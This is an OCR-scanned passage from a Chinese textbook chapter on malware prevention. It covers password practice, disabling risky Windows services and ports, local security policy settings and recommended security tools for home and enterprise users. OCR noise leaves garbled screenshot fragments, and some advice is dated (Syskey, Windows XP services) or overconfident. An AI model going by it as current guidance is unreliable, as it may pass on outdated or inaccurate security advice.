网 络 专家 称 :“ 重 要 的 硬件 设施 虽然 非常 重视 杀毒 、 防 黑客 ,但 网 络 真正 的 安全 漏洞 来 
自 于 家 庭 用 户 ,这些 个 体 用 户 欠缺 自我 保护 的 知识 ,让 网 络 充满 地 雷 , 进 而 对 其 他 用 户 构成 

尽管 单机 用 户 的 恶意 代码 防治 非常 重要 ,但 相对 于 企业 用 户 而 言 , 单 机 用 户 的 系统 结构 
简单 ,设置 容易 ,并 且 对 安全 的 要 求 相对 较 低 。 单 机 用 户 系 统 的 特点 如 下 。 

(1) 只 有 一 台 计 算 机 。 

(2) 上 网 方式 简单 (只 通过 单一 网 卡 与 外 界 进行 数据 交互 ) 。 

(3) 威胁 相对 较 低 。 

(4) 损失 相对 较 低 。 

由 此 可 见 , 个 人 用 户 的 恶意 代码 防治 工作 相对 简单 。 但 是 ,由 于 大 多 数 单机 用 户 的 计算 
机 安全 防范 意识 相对 较 差 ,特别 是 恶意 代码 防范 技术 更 是 特别 的 薄弱 ,因此 ,单机 用 户 不 仅 
需要 易于 使 用 的 防范 软件 ,而 且 需 要 简单 的 使 用 方法 等 方面 的 培训 。 


12.3.1 一 般 技 术 措 施 


(1) 新 购置 的 计算 机 ,安装 完成 操作 系统 之 后 ,第 一 时 间 进 行 系统 升级 ,保证 修补 所 有 
已 知 的 安全 漏洞 。 
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(2) 使 用 高 强度 的 口令 ,如 字母 数字、 符合 的 组 合 , 并 定期 更 换 。 对 不 同 的 账号 选用 不 
同 的 口令 。 

(3) 及 时 安装 系统 补丁 ,安装 杀毒 软件 并 定时 升级 和 全 面 查 杀 。 恶 意 代 码 编 制 技术 已 
经 和 黑客 技术 逐步 融合 , 下载、 安装 补丁 程序 和 杀毒 软件 升级 将 成 为 防治 恶意 代码 的 有 效 
手段 。 

(4) 重要 数据 应 当 留 有 备份 。 特 别 是 要 做 到 经 常 性 地 对 不 易 复 得 的 数据 (个 人 文档 、 程 
序 源 代码 等 ) 使 用 光盘 等 介质 进行 完全 备份 。 

(5) 选择 并 安装 经 过 权威 机 构 认 证 的 安全 防范 软件 ,经 常 对 系统 的 核心 部 件 进行 检查 ， 
定期 对 整个 硬盘 进行 检测 。 

(6) 使 用 网 络 防火 墙 ( 个 人 防火 墙 ) 保 障 系统 的 安全 性 。 

(7) 当 不 需要 使 用 网 络 时 ,就 不 要 接 人 互联 网 ,或 者 断 开 网 络 连接 。 

(8) 设置 杀毒 软件 的 邮件 自动 杀毒 功能 。 不 要 随意 打开 陌生 人 发 来 的 电子 邮件 ,无 论 
它们 有 多 么 诱 人 的 标题 或 附件 。 同 时 也 要 小 心 处 理 来 自 于 熟人 的 邮件 附件 。 

(9) 正确 配置 恶意 代码 防治 产品 ,发 挥 产 品 的 技术 特点 ,保护 自身 系统 的 安全 。 

(10) 充分 利用 系统 提供 的 安全 机 制 ,正确 配置 系统 ,减少 恶意 代码 入 侵 事 件 。 

(11) 定期 检查 敏感 文件 ,保证 及 时 发 现 已 感染 的 恶意 代码 和 黑客 程序 。 


12.3.2 个 人 用 户 上 网 基本 策略 


网 络 在 给 人 们 的 工作 和 学 习 带 来 便利 的 同时 也 促进 了 恶意 代码 的 发 展 与 传播 。 弓 庸 置 
疑 ,网 络 成 了 恶意 代码 传播 的 最 重要 媒介 。 因 此 ,采用 规范 的 上 网 措施 是 个 人 计算 机 用 户 防 
范 恶意 代码 侵扰 的 一 个 关键 环节 。 根 据 个 人 用 户 的 上 网 特点 ,在 此 给 出 了 个 人 计算 机 用 户 
上 网 的 基本 策略 。 

(1) 关闭 浏览 器 Cookie 选项 。Cookie 通常 记录 一 些 敏感 信息 ,如 用 户 名 、 计 算 机 名 、 使 
用 的 浏览 器 和 曾经 访问 的 网 站 。 如 果 用 户 不 希望 这 些 内 容 泄 露出 去 ,尤其 是 当 其 中 还 包含 
有 私人 信息 时 ,可 以 关闭 浏览 器 的 Cookie 选项 。 禁 用 Cookie 选项 对 绝 大 多 数 网 站 的 访问 
不 会 造成 影响 ,并且 可 以 有 效 地 防止 私人 信息 的 泄露 。 

(2) 使 用 个 人 防火 墙 。 防 火 墙 的 隐私 设置 功能 允许 用 户 设置 计算 机 中 的 那些 文件 属于 
保密 信息 ,从 而 避免 这 些 信 息 被 发 送 到 不 安全 的 网 络 上 。 防 火 墙 的 恶意 代码 防范 功能 还 可 
以 防止 网 站 服务 器 在 用 户 未 察觉 的 情况 下 跟踪 用 户 的 电子 邮件 地 址 和 其 他 个 人 信息 ,保护 
计算 机 和 个 人 数据 免 遭 黑客 人 侵 。 

(3) 浏览 电子 商务 网 站 时 尽 可 能 使 用 安全 的 连接 方式 。 通 常 浏览 器 会 在 状态 栏 中 使 用 
一 个 锁 形 图 标 表 示 当 前 连接 是 否 被 加 密 。 在 进行 任何 的 交易 或 发 送信 息 之 前 ,要 阅读 网 站 
的 隐私 保护 政策 ,因为 有 些 网 站 会 将 个 人 信息 出 售 给 第 三 方 。 

(4) 不 透露 关键 信息 。 关 键 信息 包括 个 人 信息 、 账 号 和 口令 等 。 黑客 有 时 会 假装 成 ISP 
服务 代表 并 询问 你 的 口令 。 真 正 的 ISP 服务 代表 不 会 问 用 户 的 口令 。 

(5) 避免 使 用 过 于 简单 的 密码 ,尽量 使 用 字母 和 数字 的 组 合并 定期 更 换 密码 。 

(6) 不 要 随意 打开 电子 邮件 附件 。 特 洛 伊 木马 程序 可 以 伪装 成 其 他 文件 ,潜伏 在 计算 
机 中 使 得 黑客 能 够 访问 用 户 的 文档 ,甚至 控制 用 户 的 设备 。 

(7) 定期 扫描 计算 机 并 查找 安全 漏洞 ,提高 计算 机 防护 蠕虫 等 恶意 代码 的 能 力 。 
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(8) 使 用 软件 的 稳定 版 本 并 及 时 安装 补丁 程序 。 各 种 软件 的 补丁 程序 往往 用 于 修复 软 
件 的 安全 漏洞 ,及 时 安装 软件 开发 商 提供 的 补丁 程序 是 十 分 必要 的 。 

(9) 尽量 关闭 不 需要 的 组 件 和 服务 程序 。 默 认 设 置 下 ,系统 往往 会 允许 使 用 很 多 不 必 
要 而 且 很 可 能 暴露 安全 漏洞 的 端口 .服务 和 协议 ,如 文件 及 打印 机 共享 服务 等 。 为 了 确保 安 
全 ,可 以 删除 不 使 用 的 服务 、 协 议和 端口 。 

(10) 尽量 使 用 代理 服务 器 上 网 。 代 理 服务 器 作为 一 个 中 间 缓 冲 ,可 以 保证 在 正常 浏览 
任何 站 点 的 同时 ,也 能 隐藏 用 户 的 计算 机 。 


12.4 如 何 建立 安全 的 单机 系统 


任何 单机 用 户 都 想 拥 有 一 个 绝对 安全 的 计算 机 环境 。 可 惜 的 是 ,这 只 是 个 理想 目标 。 
本 节 以 Windows 操作 系统 为 例 , 介 绍 建立 一 个 安全 的 计算 机 环境 需要 做 的 5 个 方面 的 工 
作 : 打 牢 基础 `. 选 好 工具 、 注 意 方法 应急 措施 .自我 提高 。 


12.4.1 打 牢 基础 


安全 的 系统 必须 有 一 个 牢固 的 基础 ,这 个 就 像 建筑 领域 的 地 基 一 样 。 计 算 机 系统 的 安 
全 基础 需要 从 硬盘 格式 .账号 管理 口令 设置 .服务 及 端口 配置 .安全 策略 等 方面 进行 规范 化 
设置 。 

1. 硬盘 格式 

Windows 系统 目前 支持 FAT、FAT32、NTFS 等 几 种 硬盘 格式 。 其 中 ,NTFS 文件 系统 
有 诸多 的 优秀 特性 ,使 得 管理 计算 机 和 用 户 权 限 、 管 理 磁 盘 空 间 、 管 理 敏感 数据 的 效率 都 得 
到 了 巨大 的 提升 。 因 此 ,在 没有 特殊 需求 时 ,应 该 把 硬盘 格式 化 为 NTFS 格式 。 

2. 账号 管理 

黑客 或 恶意 代码 通常 特别 关注 Windows 系统 中 默认 的 账号 ,如 Guest 和 Administrator。 
Administrator 作为 管理 员 拥有 系统 管理 的 所 有 权限 ,而 Guest 只 有 很 少 的 一 部 分 权限 。 当 
黑客 进行 远程 人 侵 时 ,通常 使 用 没有 密码 的 Guest 账号 登录 计算 机 ,然后 设法 通过 某 些 系统 
漏洞 提升 Guest 账号 的 权限 ,达到 操作 计算 机 的 目的 。 为 了 更 好 地 保护 计算 机 的 安全 ,最 好 
禁用 Guest 账户 。 

对 于 Administrator 账号 也 建议 用 户 停 用 。 当 然 在 停 用 之 前 ,必须 先生 成 一 个 新 的 账 
号 ,如 newadmin, 并 给 予 newadmin 以 管理 员 权限 。 这 样 就 可 以 把 Administrator 账号 停 掉 
了 。 当 然 ,还 可 以 做 得 更 彻底 一 点 ,直接 删除 系统 默认 的 Administrator 账号 。 

3. 口令 设置 

为 了 防止 黑客 和 恶意 代码 突破 用 户 的 系统 ,还 需要 设置 难度 更 大 的 口令 。 简 单 的 口令 
能 够 轻易 被 暴力 破解 。 因 此 ,建议 用 户 给 自己 的 系统 设置 一 个 复杂 强大 的 口令 ,此 外 ,也 可 
以 使 用 附加 的 口令 加 强 工具 。 

复杂 的 口令 安全 但 不 宜 记 住 ,这 也 是 大 多 数 用 户 选 择 弱 口令 的 主要 原因 。 信 息 安 全 专 
家 提供 了 很 多 设置 复杂 且 易 于 牢记 口令 的 办 法 ,其 中 最 优秀 的 就 是 用 熟悉 的 谚语 或 歌词 的 
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字母 转换 为 口令 。 例 如 ,北京 欢迎 你 ,五 大 洲 的 朋友 ”, 可 以 转换 为 "bjhynwdzdpy”。 这 个 
口令 对 于 破解 程序 而 言 , 非 常 无 序 且 难以 猜 解 。 如 果 再 使 用 一 些 大 写字 母 , 就 更 加 安 
= 

SAM 数据 破解 是 黑客 突破 系统 的 另 一 个 手段 ,为 了 防止 黑客 通过 SAM 获得 口令 ,可 
以 使 用 Syskey 进行 加 固 。 用 过 去 的 加 密 机 制 ,攻击 者 只 需 取 得 一 份 加 密 的 SAM 库 的 复 
制 ,使 用 专门 的 软件 破解 用 户口 令 。Syskey 是 Windows 系统 自 带 的 一 个 工具 ,可 以 用 来 保 
护 SAM 数据 库 不 被 离线 破解 。Syskey 对 数据 库 采 用 了 更 多 的 加 密 措施 ,目的 是 增加 破解 
的 计算 量 , 使 暴力 破解 从 时 间 上 考虑 不 可 行 。 使 用 Windows 的 自动 更 新 即 可 安装 Syskey 
功能 。 

4. 服务 及 端口 配置 

初次 安装 操作 系统 后 ,系统 会 默认 开启 的 很 多 不 必要 的 服务 。 这 些 多 余 的 不 必要 的 服 
务 会 给 系统 带 来 一 定 的 安全 隐患 ,所 以 应 该 根据 用 户 的 实际 需求 ,把 多 余 的 服务 关闭 。 

系统 默认 开启 的 多 余 端 口 ,会 为 蠕虫 .木马 等 恶意 代码 及 黑客 提供 入 侵 途 径 。 因 此 ,也 
建议 关闭 多 余 的 端口 。 

Windows 系统 中 多 余 的 服务 列举 如 下 。 

(1) Messenger 服务 : 即 信使 服务 ,这 是 一 个 非常 危险 的 服务 。 该 服务 可 以 帮助 计算 机 
用 户 在 局 域 网 内 交换 资料 , 它 主 要 用 在 企业 的 网 络 管理 方面 .但 是 垃圾 邮件 和 垃圾 广告 厂商 
也 经 常 利用 该 服务 发 布 弹出 式 广告 。 这 项 服务 曾经 有 威胁 漏洞 , MSBlast 和 Slammer 可 以 
用 它 进 行 传播 。 

(2) Terminal Services 服务 : 即 远 程控 制服 务 , 允 许多 位 用 户 连接 并 控制 一 台 机 器 ,并 
且 在 远程 计算 机 上 显示 桌面 和 应 用 程序 。 如 果 不 使 用 Windows 的 远程 控制 功能 ,建议 禁 
虫 客 。 

(3) Remote Registry 服务 : 使 远程 用 户 能 修改 此 计算 机 上 的 注册 表 。 注 册 表 是 系统 的 
核心 内 容 ,一 般 不 建议 用 户 自行 更 改 , 更 何况 要 让 他 人 远程 修改 ,所 以 这 项 服务 是 极其 危 
险 的 。 

(4) Telnet 服务 : 允许 远程 用 户 登录 到 此 计算 机 并 运行 程序 ,支持 多 种 TCP/IP Telnet 
客户 ,包括 基于 UNIX 和 Windows 的 计算 机 。 如 果 启 动 该 服务 ,远程 用 户 就 可 以 登录 访问 
本 地 的 程序 ,甚至 可 以 用 它 来 修改 ADSL Modem 等 网 络 设 置 。 这 是 一 个 危险 的 服务 ,建议 
用 户 一 定 要 禁止 该 服务 。 

(5) Performance Logs And Alerts 服务 : 收集 本 地 或 远程 计算 机 基于 预先 配置 的 日 程 
参数 的 性 能 数据 ,然后 将 此 数据 写 和 日 志 或 触发 警报 。 为 了 防止 被 远程 计算 机 搜索 数据 , 建 
议 禁止 该 服务 。 

(6) Remote Desktop Help Session Manager 服务 : 远程 桌面 协助 服务 ,用 于 管理 和 控 
制 远程 协助 。 该 服务 对 普通 用 户 用 处 不 大 .可 以 关闭 。 如 果 此 服务 被 终止 ,远程 协助 将 不 可 
使 用 。 

(7) TCP/IP NetBIOS Helper 服务 : NetBIOS 在 Windows 9X 下 就 经 常 被 用 来 进行 攻 
击 , 对 于 不 需要 文件 和 打印 共享 的 用 户 , 可 以 禁用 此 服务 。 

(8) Fast User Switching Compatibility 服务 : 在 多 用 户 下 为 需要 协助 的 应 用 程序 提供 
管理 。 通 过 该 服务 ,Windows XP 允许 在 一 台 计 算 机 上 进行 多 用 户 之 间 的 快速 切换 ,但 是 这 
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项 功能 曾经 有 漏洞 。 如 果 不 经 常 使 用 ,可 以 禁止 该 服务 。 

(9) NetMeeting Remote Desktop Sharing 服务 : 允许 受权 的 用 户 通 过 NetMeeting 在 
网 络 上 互相 访问 对 方 。 这 项 服务 对 大 多 数 个 人 用 户 并 没有 多 大 用 处 ,并 且 会 带 来 安全 问题 。 
上 网 时 该 服务 会 把 用 户 名 以 明文 形式 发 送 到 连接 它 的 客户 端 , 嗅 探 程 序 很 容易 就 能 探测 到 
这 些 账 户 信息 。 

(10) Universal Plug and Play Device Host 服务 : 为 即 插 即 用 设备 提供 支持 。 该 服务 
存在 一 个 安全 漏洞 .运行 此 服务 的 计算 机 很 容易 受到 攻击 。 攻 击 者 只 要 向 某 个 拥有 多 台 
Windows XP 系统 的 网 络 发 送 一 个 虚假 的 UDP 包 , 就 可 能 会 造成 这 些 主 机 对 指定 的 主机 进 
行 DDOS 攻击 。 

Windows 默认 且 必 须 关 闭 的 端口 往往 是 系统 的 服务 开放 的 ,如 果 关 闭 了 相应 的 服务 ， 
其 对 应 的 端口 也 就 关闭 了 。Windows 系统 比较 危险 的 端口 如 下 。 

21 端口 : 主要 用 于 FTP 服务 。 如 果 不 架 设 FTP 服务 器 ,建议 关闭 21 端口 。 

23 端口 : 主要 用 于 Telnet 服务 ,也 是 TTS 木马 的 默认 端口 ,因此 建议 关闭 它 。 

25 端口 : 该 端口 为 SMTP 服务 开放 的 端口 ,如果 不 是 要 架设 SMTP 邮件 服务 器 ,可 以 
将 该 端口 关闭 。 

53 端口 : 该 端口 为 DNS 服务 器 所 开放 ,主要 用 于 域名 解析 ,如 果 当 前 的 计算 机 不 是 用 
于 提供 域名 解析 服务 ,建议 关闭 该 端口 。 

123 端口 : 是 Windows Time 服务 开放 的 端口 ,该 端口 可 以 被 某 些 蠕虫 利用 ,建议 禁 
用 它 。 

135 端口 : 主要 用 于 使 用 RPC 协议 并 提供 DCOM( 分 布 式 组 件 对 象 模型 ) 服务 ,通过 
RPC 可 以 保证 在 一 台 计 算 机 上 运行 的 程序 可 以 顺利 地 执行 远程 计算 机 上 的 代码 。 这 也 是 
蠕虫 常用 的 端口 ,强烈 建议 关闭 。 

137、138 端口 : 这 两 个 是 UDP 端口 , 当 通过 网 上 邻居 传输 文件 时 用 这 个 端口 。 对 于 攻 
击 者 来 说 ,通过 发 送 请 求 很 容易 就 获取 目标 计算 机 的 相关 信息 ,有 些 信息 可 以 被 用 来 分 析 漏 
洞 。 另 外 ,通过 捕获 正在 利用 137 端口 进行 通信 的 信息 包 , 还 可 能 得 到 目标 计算 机 的 启动 和 
关闭 的 时 间 ,这 样 就 可 以 利用 专门 的 工具 来 攻击 。 

139 端口 : 是 为 NetBIOS Session Service 服务 开放 的 端口 ,主要 用 于 提供 Windows 文 
件 和 打印 机 共享 及 UNIX 中 的 Samba 服务 。 Windows 系统 要 在 局 域 网 中 进行 文件 的 共 
享 ,必须 使 用 该 服务 。 开 启 139 端口 虽然 可 以 提供 共享 服务 ,但 是 常常 被 攻击 者 用 来 进 
行 攻击 。 黑 客 利用 专门 的 扫描 工具 扫描 目标 计算 机 的 139 端口 ,如 果 发 现 有 漏洞 ,可 以 
尝试 获取 用 户 名 和 口令 ,这 是 非常 危险 的 。 如 果 不 需 要 提供 文件 和 打印 机 共享 ,建议 关 
闭 该 端口 。 

445 端口 : 这 是 关于 文件 和 打印 共享 的 端口 ,也 是 比较 容易 受 攻击 的 端口 。 如 果 不 使 
用 共享 服务 ,可 以 将 其 关闭 。 

1900 端口 : SSDP Discovery Service 服务 开放 的 端口 。 关 闭 这 个 端口 ,可 以 防范 DDOS 
攻击 。 

3389 端口 : 这 是 Windows 的 远程 管理 终端 所 开 的 端口 . 它 并 不 是 一 个 木马 程序 ,请 先 
确定 该 服务 是 否 是 自己 开放 的 。 如 果 不 是 必需 的 ,请 关闭 该 服务 。 
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5. 使 用 本 地 安全 策略 


Windows 系统 自 带 的 “本 地 安全 策略 ”是 一 个 很 不 错 的 系统 安全 管理 工具 。 这 个 工具 
涵盖 的 内 容 非常 多 ,通过 这 个 工具 可 以 管理 账号 口令、 权限 .审核 等 内 容 。 下 面 简单 介绍 本 
地 安全 策略 中 的 账号 策略 和 口令 策略 。 本 地 安全 策略 位 于 控制 面板 的 管理 工具 中 。 

1) 账号 管理 

为 了 防止 人 侵 者 利用 漏洞 登录 计算 机 ,要 在 此 设置 重 命名 系统 管理 员 账 户 名 称 及 禁用 
来 宾 账 户 。 设 置 方法 为 : 在 “本 地 策略 ”>“ 安 全 选项 ”下 选中 “账户 : 来 宾 账 户 状态 ”策略 并 
右 击 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,而 后 在 弹出 的 属性 对 话 框 中 选中 “已 停 用 ” 单 选 
按钮 ,最 后 单 击 “ 确 定 ” 按 钮 退出 ,如 图 12-1 所 示 。 

大 本 地 安全 策略 口 


文件 (F) 操作 (A) 查看 (V) 帮助 (H) 
各 中 | 直 国 其 国 目 | 回回 


图 12-1 来 宾 账号 管理 


2) 禁止 枚 举 账号 

某 些 具 有 黑客 行为 的 蠕虫 病毒 ,可 以 通过 扫描 Windows 系统 的 指定 端口 ,然后 通过 共 
享 会 话 猜 测 管理 员 系 统 口令 。 因 此 ,用 户 需要 在 “本 地 安全 策略 ?中 设置 禁止 枚 举 账号 ,从 而 
抵御 此 类 入 侵 行为 ,操作 步骤 如 下 。 

在 “本 地 安全 策略 "界面 左 侧 列表 的 “安全 设置 "目录 树 中 , 逐 层 展开 “本 地 策略 ”>“ 安 全 
选项 ”选项 。 查 看 右 侧 的 相关 策略 列表 ,选中 “网 络 访问 : 不 允许 SAM 账户 和 共享 的 匿名 枚 
举 ” 选 项 并 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,而 后 会 弹出 一 个 对 话 框 ,在 此 选中 
“已 启用 ” 单 选 按钮 ,最 后 单 击 “ 应 用 ”按钮 使 设置 生效 ,如 图 12-2 所 示 。 

3) 口令 策略 

在 “安全 设置 "中 , 先 定位 于 “账户 策略 ”>“ 密 码 策 略 ” 选 项 ,在 其 右 侧 设置 视图 中 ,可 进 
行 相应 的 设置 ,以 使 用 户 的 系统 密码 相对 安全 , 且 不 易 破解 。 如 防 破解 的 一 个 重要 手段 就 是 
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到 本地 安全 条 咯 大 口 X 
文件 (F) ”操作 (A) 查看 (V) 帮助 (H) 
各 中 | 训 司 X 目 电 | 日 晤 
Ee 策略 安全 设置 放 
eR 央 网 络 访问 : 不 允许 SAM 帐户 的 匿名 术 举 已 启用 
“局 SAMPI ER 


? x 


局 审核 第 略 
» 国 网 络 访问 : 不 允许 SAM 帐户 和 共享 的 医 名 枚 举 尾 性 
加 本 地 安全 设置 说 明 
贡 网 络 访问 : 不 允许 SAM 帐户 和 共享 的 匿名 枚 举 


图 12-2 禁止 枚 举 账号 
定期 更 新 密码 ,可 据 此 进行 如 下 设置 : 右 击 “ 密 码 最 长 使 用 期 限 ”, 在 弹出 的 快捷 菜单 中 选择 
“属性 ”选项 ,在 弹出 的 对 话 框 中 ,读者 可 自 定义 一 个 密码 设置 后 能 够 使 用 的 时 间 长 短 。 如 果 
超过 该 时 间 ,该 口令 对 应 的 账号 将 被 禁止 ,如 图 12-3 所 示 。 


局 本 地 安全 第 咯 
文件 (F) “操作 (A) ”查看 (V) 帮助 (H) 
各 中 各 克 闪电 日 四 


12-3 口令 策略 设置 


完成 上 述 5 个 步骤 ,用 户 的 系统 已 经 具有 了 一 个 非常 牢固 的 基础 。 当 然 ,是否 牢固 不 能 
空 口 无 凭 。 在 此 ,给 用 户 推 荐 几 个 评估 系统 安全 性 的 工具 ,如 脆弱 性 分 析 工 具 、 漏 洞 扫描 工 
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具 \ 口 令 破解 工具 等 。 如 果 这 几 个 工具 都 认为 系统 是 安全 的 ,那么 系统 就 是 安全 的 。 

(1) 脆弱 性 分 析 工 具 。 脆 弱 性 分 析 工 具 主 要 用 于 分 析 系 统 的 脆弱 性 ,当然 ,也 可 用 于 评 
估 重 要 应 用 程序 (如 Office 套件 ) 的 脆弱 性 。 该 类 工具 被 运行 后 ,会 给 用 户 一 个 评估 报告 ， 
如 系统 的 账号 是 否 安 全 ,口令 是 否 安 全 、 系 统 和 重要 应 用 是 否 及 时 打 补 丁 等 。 微 软 为 自己 的 
操作 系统 开发 了 一 个 著名 的 脆弱 性 分 析 工 具 , 即 Microsoft Baseline Security Analyzer 
(MBSA)。Microsoft Baseline Security Analyzer 的 分 析 内 容 主 要 包括 系统 管理 权限 脆弱 性 
分 析 、 弱 口令 分 析 IIS 服务 器 脆弱 性 分 析 、SQL Server 管理 员 脆 弱 性 分 析 、 系 统 更 细 配 置 分 
析 、 防 火 墙 及 杀毒 软件 脆弱 性 分 析 等 。 

(2) 漏洞 扫描 工具 。 漏 洞 扫 描 工 具 常 被 简称 为 Scan, 是 攻防 双方 必 备 的 工具 。 黑 客 用 
它 发 现 目标 危险 端口 .系统 漏洞 等 ,并 根据 扫描 结果 判断 入侵 难 度 , 选 择 合适 的 人 侵 工 具 。 
安全 防护 人 员 借 助 这 个 工具 可 以 先 于 黑客 发 现 这 些 危险 端口 和 漏洞 ,事先 把 漏洞 堵 住 ,把 端 
口 关闭 ,不 给 黑客 可 乘 之 机 。 

比较 著名 的 漏洞 扫描 工具 为 Nessus。 该 工具 一 直 以 漏洞 库 齐全 ,扫描 速度 快 . 结 果 准 
确 度 高 等 优点 著称 。 

(3) 口令 破解 工具 。 口令 破解 是 专门 用 来 破解 系统 口令 的 工具 ,同样 也 是 攻防 双方 必 
备 的 工具 。 安 全 防护 人 员 通 过 该 工具 可 以 验证 自己 的 口令 是 否 安全 可 靠 。 

著名 的 口令 破解 工具 为 LC5。LC5 既 可 直接 读 取 系统 的 SAM 文件 ,也 可 以 在 网 络 上 
嗅 探 用 户 的 口令 。 其 主要 采用 穷 举 法 进行 口令 破解 ,只 要 时 间 允 许 , 可 以 破译 所 有 的 口令 。 
实验 测试 可 知 , 用 LC5 破解 6 位 纯 数 字 的 口令 ,通常 只 需 20 分 钟 。 


12.4.2 选 好 工具 


在 牢固 地 基 的 基础 上 ,还 要 为 用 户 的 系统 选择 合适 的 恶意 代码 防范 工具 。 恶 意 代码 是 
防不胜防 的 ,好 的 工具 可 以 为 系统 提供 优质 的 服务 。 因 此 ,读者 需要 为 自己 的 系统 选择 合适 
的 杀毒 软件 .杀毒 软件 搭档 、 补 丁 管理 和 升级 工具 个 人 防火 墙 \ 木 马 专 杀 工具 等 。 

1. 杀毒 软件 

11. 3. 1 节 介 绍 了 选择 杀毒 软件 的 标准 ,11. 3. 2 节 介 绍 了 一 些 商用 杀毒 软件 的 名 称 , 并 引 
用 了 第 三 方 机 构 关于 一 些 杀毒 软件 的 评价 。 用 户 可 以 参考 上 述 内 容 选 择 自己 喜欢 的 杀毒 软件 。 

2. 杀毒 软件 的 搭档 

实践 已 经 证 明 , 仅 仅 依赖 杀毒 软件 已 经 不 能 防范 日 益 强大 的 恶意 代码 了 。 因 此 ,需要 给 
杀毒 软件 配备 一 个 搭档 。 借 助 这 类 搭档 ,用 户 能 够 方便 地 查看 系统 的 启动 项 和 服务 运行 ,能 
够 方便 地 清理 系统 垃圾 .设置 IE 等 应 用 程序 的 选项 。 例 如 ,魔法 兔子 .优化 程序 .360 安全 
卫士 等 就 是 这 类 程序 的 典型 代表 。 其 中 ,作者 推荐 360 安全 卫士 作为 杀毒 软件 的 最 佳 搭档 。 
360 的 功能 非常 强大 ,除了 具有 优化 功能 外 ,还 能 管理 补丁 软件 升级 及 木马 查 杀 等 。 

3. 补丁 管理 和 升级 工具 

大 型 软件 是 个 复杂 的 系统 ,Bug 不 可 避免 ,因此 ,操作 系统 、 大 型 应 用 程序 都 存在 大 量 的 
漏洞 。 为 了 弥补 过 失 ,软件 生 产 厂商 会 发 布 补丁 。 尽 管 操作 系统 本 身 会 附带 自动 升级 功能 ， 
第 三 方 软件 提供 的 补丁 管理 和 升级 功能 往往 更 加 人 性 化 。360 安全 卫士 是 非常 好 的 第 三 方 
补丁 管理 和 升级 工具 。360 卫士 可 以 自动 检测 用 户 系统 的 漏洞 ,自动 下 载 并 安装 补丁 。 迄 
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今 为 止 ,360 安全 卫士 可 以 管理 操作 系统 .Office 套件 、Realplay、Adobe 等 大 型 软件 的 补丁 ， 
并 指导 用 户 升 级 。 

4. 个 人 防火 墙 

补丁 管理 和 升级 帮助 用 户 封 堵 了 蠕虫 这 类 恶意 代码 ,个 人 防火 墙 则 是 用 户 对 付 特洛伊 
木马 这 类 恶意 代码 的 必要 装备 。 作 者 推荐 使 用 Windows 自 带 的 个 人 防火 墙 。 

5. 木马 专 杀 工具 

2005 年 后 ,特洛伊 木马 取代 蠕虫 成 为 了 恶意 代码 的 主力 ,因此 ,防范 木马 成 为 当前 恶意 
代码 防范 工作 的 重点 。 用 户 可 以 在 使 用 防 病 毒 软件 的 基础 上 ,选择 一 款 木 马 专 杀 工 具 来 专 
门 对 付 特 洛 伊 木马 。 


12.4.3 注意 方法 


“三 分 技术 ,七 分 管理 ?是 当前 信息 安全 防范 工作 的 真实 写照 。 为 了 使 用 户 的 计算 机 系 
统 更 加 安全 ,同样 需要 在 技术 装备 的 基础 上 ,注意 对 这 些 技术 的 使 用 和 配置 方法 。 良 好 的 习 
惯 \ 正 确 的 配置 和 使 用 方法 能 够 使 用 户 安装 的 工具 达到 最 大 防范 效果 。 


12.4.4 ”应 急 措施 


随 着 信息 技术 的 发 展 ,信息 资源 管理 将 被 作为 国家 战略 来 推进 ,企业 竞争 的 焦点 也 将 落 
在 对 信息 资源 的 开发 利用 上 。“ 三 分 技术 ,七 分 管理 ,十 二 分 数据 ”的 说 法 成 为 现代 企业 信息 
化 管理 的 标志 性 注释 。 信 息 资 源 已 经 成 为 继 土 地 和 资本 之 后 最 重要 的 财富 来 源 。 同 样 , 对 
于 个 人 用 户 来 说 ,个 人 创作 的 数据 也 是 弥 足 珍贵 的 。 因 此 ,只 有 考虑 了 数据 备份 和 恢复 功能 
的 系统 才能 称 得 上 一 个 安全 的 系统 。 
12.4.5 自我 提高 

为 什么 需要 自我 提高 ? 上 述 内 容 还 不 够 吗 ? 谚语 “ 道 高 一 尺 , 魔 高 一 丈 ” 可 以 形象 地 描 
述 信息 安全 领域 攻防 双方 的 较量 过 程 。 在 攻防 双方 的 相互 促进 过 程 中 ,防范 技术 的 学 习 一 
刻 也 不 能 停止 。 因 此 ,作者 认为 ,对 于 一 个 敬业 的 安全 管理 人 员 来 说 ,需要 在 如 下 两 个 方面 
提高 自己 、 武 装 自己 。 

1. 关注 安全 信息 

安全 信息 获取 的 最 佳 途径 莫 过 于 信息 安全 产品 厂商 网 站 、 评 测 机 构 网 站 、 安 全 技术 论坛 
等 。 因 此 ,建议 用 户 成 为 这 些 地 方 的 常客 。 

详细 的 资料 可 以 参考 本 书 的 附录 ,这 里 有 作者 推荐 的 安全 信息 发 布 渠 道 。 

2. 掌握 专业 工具 

微软 公司 的 Sysinternals Suite® 工具 套件 是 非常 著名 的 专业 安全 工具 ,里 面 有 近 百 种 
小 工具 。 例 如 ,Autoruns、FileMon、Process Monitor、Rootkit Revealer、TCPView 等 都 是 其 
中 的 典型 代表 。12. 5.4 节 将 介绍 的 额外 的 预防 工具 也 提 到 一 些 诸如 入 侵 检测 、 蜜 钢 之 类 的 


@® https: //docs. microsoft. com/en-us/sysinternals/downloads/ sysinternals-suite。 


第 12 章 恶意 代码 防治 策略 313 


工具 ,在 特殊 环境 下 ,它们 都 将 成 为 安全 人 员 应 对 新 恶意 代码 的 有 力 工具 。 
12.5 企业 用 户 防 治 策略 


一 个 好 的 企业 级 恶意 代码 防治 策略 应 包括 以 下 几 个 步骤 。 

(1) 开发 和 实现 一 个 防御 计划 。 

(2) 使 用 一 个 可 靠 的 恶意 代码 扫描 程序 。 

(3) 加 固 每 个 单独 系统 的 安全 。 

(4) 配置 额外 的 防御 工具 。 

整个 防御 应 当 涵 盖 所 有 受 控 计算 机 和 网 络 中 的 策略 和 规章 ,包括 终端 用 户 的 培训 、 列 出 
实用 工具 、 建 立 对 付 突 发 事件 的 方法 等 。 为 了 更 有 效 地 防范 恶意 代码 ,企业 中 的 每 一 台 计 算 
机 都 要 进行 统一 配置 。 作 为 防御 计划 的 一 部 分 ,选择 一 个 优秀 的 恶意 代码 防范 软件 是 非常 
关键 的 问题 。 最 后 ,在 多 个 工具 的 共同 作用 下 , 即 可 实现 一 个 良好 且 坚 固 的 防治 体系 。 

